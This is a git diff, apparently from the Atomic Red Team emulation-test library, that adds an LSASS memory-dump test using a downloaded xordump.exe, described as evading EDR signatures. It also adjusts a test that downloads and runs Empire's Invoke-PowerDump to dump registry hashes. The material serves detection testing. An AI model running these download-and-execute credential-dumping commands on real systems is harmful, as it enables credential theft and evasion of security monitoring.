diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 8a3b34df..5381987b 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2a0d36ac..aed4c67a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d9a87458..d3f145a5 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -450,6 +450,7 @@
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d2bd5efb..c3d3acfa 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -50,6 +50,7 @@
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 71ce48ba..9c28f3bc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -20953,6 +20953,43 @@ credential-access:
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: 'del #{output_file}
+'
+ name: powershell
+ elevation_required: true
+ - name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+ description: "The memory of lsass.exe is often dumped for offline credential
+ theft attacks. This can be achieved by\nimporting built-in DLLs and calling
+ exported functions. Xordump will re-read the resulting minidump \nfile and
+ delete it immediately to avoid brittle EDR detections that signature lsass
+ minidump files.\n\nUpon successful execution, you should see the following
+ file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: 'Computer must have xordump.exe
+
+'
+ prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
+ -OutFile #{xordump_exe}
+
+'
+ executor:
+ command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
+ cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
+
'
name: powershell
elevation_required: true
@@ -22732,7 +22769,7 @@ credential-access:
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index aad552e0..26822e04 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials:
- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
+- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
+
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
+
+
+
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe|
+| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+#{xordump_exe} -out #{output_file} -x 0x41
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item ${output_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Computer must have xordump.exe
+##### Check Prereq Commands:
+```powershell
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+```
+
+
+
+
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 2014b6e2..eb902b08 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -138,6 +138,7 @@ atomic_tests:
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
+
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
@@ -158,6 +159,7 @@ atomic_tests:
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
name: manual
+
- name: Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
description: |
@@ -354,3 +356,37 @@ atomic_tests:
del #{output_file}
name: powershell
elevation_required: true
+
+- name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+ importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+ file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+ Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: |
+ Computer must have xordump.exe
+ prereq_command: |
+ if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+ executor:
+ command: |
+ #{xordump_exe} -out #{output_file} -x 0x41
+ cleanup_command: |
+ Remove-Item ${output_file} -ErrorAction Ignore
+ name: powershell
+ elevation_required: true
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index d2b817bc..1516c1da 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry.
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-Import-Module .\PowerDump.ps1
+Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
```
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 081107a1..958fac22 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -94,7 +94,7 @@ atomic_tests:
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index eba1dedd..d80b426b 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -692,3 +692,4 @@ c75612b2-9de0-4d7c-879c-10d7b077072d
e86f1b4b-fcc1-4a2a-ae10-b49da01458db
10447c83-fc38-462a-a936-5102363b1c43
fcbdd43f-f4ad-42d5-98f3-0218097e2720
+86fc3f40-237f-4701-b155-81c01c48d697